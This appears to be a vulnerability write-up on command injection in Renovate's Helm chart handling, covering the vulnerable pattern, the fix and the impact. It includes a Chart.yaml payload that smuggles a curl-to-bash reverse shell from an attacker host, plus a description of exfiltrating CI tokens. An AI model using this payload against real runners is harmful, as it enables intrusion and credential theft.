Helm Breaks Loose: Command Injection in Renovate via Malicious Charts

Renovate is the unsung hero of modern DevOps. It tirelessly scans your repositories, identifies outdated dependencies, and opens Pull Requests to keep you secure. It is effectively a robot with read/write access to your entire codebase and often runs with significant privileges in CI/CD pipelines to perform these tasks. But here is the catch: to do its job, Renovate must parse and interpret the configuration files it finds—files that are often controlled by developers, or in open-source contexts, potentially malicious contributors.

In this specific case, the vulnerability lies within the helmv3 manager. Helm, the package manager for Kubernetes, has moved towards OCI (Open Container Initiative) registries for storing charts. When Renovate encounters a Helm chart dependency pointing to an OCI registry, it attempts to be helpful by authenticating with that registry to check for updates. This helpfulness, implemented without sufficient paranoia, opens the door to a classic vulnerability class: OS Command Injection.

The flaw is conceptually simple but devastating. When Renovate parses a Chart.yaml file, it looks for dependencies. If a dependency specifies a repository URL, Renovate needs to interact with that repository. For OCI registries, the workflow involves logging in via the Helm CLI.

The logic flow looks roughly like this:

1. Parse Chart.yaml.
2. Extract the repository URL.
3. Construct a shell command: helm registry login <repository> ....
4. Execute the command.

The fatal error here is assuming that the repository field in a YAML file is actually a URL. In reality, it is just a string. If the application takes this string and concatenates it directly into a shell command without sanitization or using an argument array, the shell will interpret any special characters included in that string. It is the programmatic equivalent of letting a stranger write part of your terminal commands.

While the exact source code snippet changes rapidly in active projects like Renovate, the mechanism of the flaw is classic. The vulnerable code effectively performed string interpolation for the system command.

The Vulnerable Pattern:

// Pseudo-code of the vulnerable logic
const cmd = `helm registry login ${repository} --username ${user} --password-stdin`;
await exec(cmd);

If repository is valid, like oci://ghcr.io, the command runs fine. But if repository is oci://ghcr.io; cat /etc/passwd, the shell sees two commands:

1. helm registry login oci://ghcr.io
2. cat /etc/passwd --username ...

The Fix: The patch in version 40.33.0 likely involves one of two standard mitigations: using execFile (or similar) where arguments are passed as an array (bypassing the shell interpreter entirely for arguments), or strictly validating that the repository string matches a safe URL pattern before usage.

// The secure pattern
const args = ['registry', 'login', repository, '--username', user, '--password-stdin'];
await execFile('helm', args);

By separating the command from its arguments at the kernel execution level, the malicious string is treated as a single literal argument rather than executable instructions.

Exploiting this requires control over a repository that Renovate is configured to scan. This could be a legitimate developer going rogue, a compromised contributor account, or in a multi-tenant environment, a malicious customer adding a repo to the scan list.

Step 1: The Trap The attacker creates a standard Helm chart but modifies the Chart.yaml file. Inside the dependencies list, they inject the payload.

apiVersion: v2
name: malicious-chart
version: 0.1.0
dependencies:
  - name: innocent-dependency
    # The Payload
    repository: "oci://registry.example.com; curl -s http://attacker.com/revshell.sh | bash; #"
    version: 1.0.0

Step 2: The Trigger The attacker commits this file to the repository. When Renovate's scheduler runs (or is triggered via webhook), it clones the repo and parses Chart.yaml. It identifies the dependency as an OCI target and attempts to authenticate.

Step 3: Execution Renovate constructs the login command. The shell executes the login (which might fail or succeed, it doesn't matter), encounters the ; semicolon, and immediately proceeds to execute the curl command. The attacker now has a reverse shell on the Renovate runner.

Renovate runners are treasure troves. They are designed to interact with your version control systems (GitHub, GitLab, Bitbucket) and your package registries (npm, Docker Hub, Artifactory).

Credentials Exfiltration: The most immediate risk is the theft of environment variables. GITHUB_TOKEN, GITLAB_TOKEN, NPM_TOKEN, and DOCKER_AUTH credentials are often present in the runner's environment. An attacker with shell access can simply run env and send the output to a remote server.

Supply Chain Poisoning: With the stolen credentials, the attacker can pivot. They can push malicious code to other repositories the bot has access to, effectively using the bot's identity to bypass branch protection rules (since bots are often whitelisted admins) and compromise the entire organization's software supply chain.